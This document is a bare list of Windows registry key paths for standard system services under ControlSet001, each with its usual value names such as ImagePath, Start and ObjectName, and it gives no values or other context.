HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\ObjectName
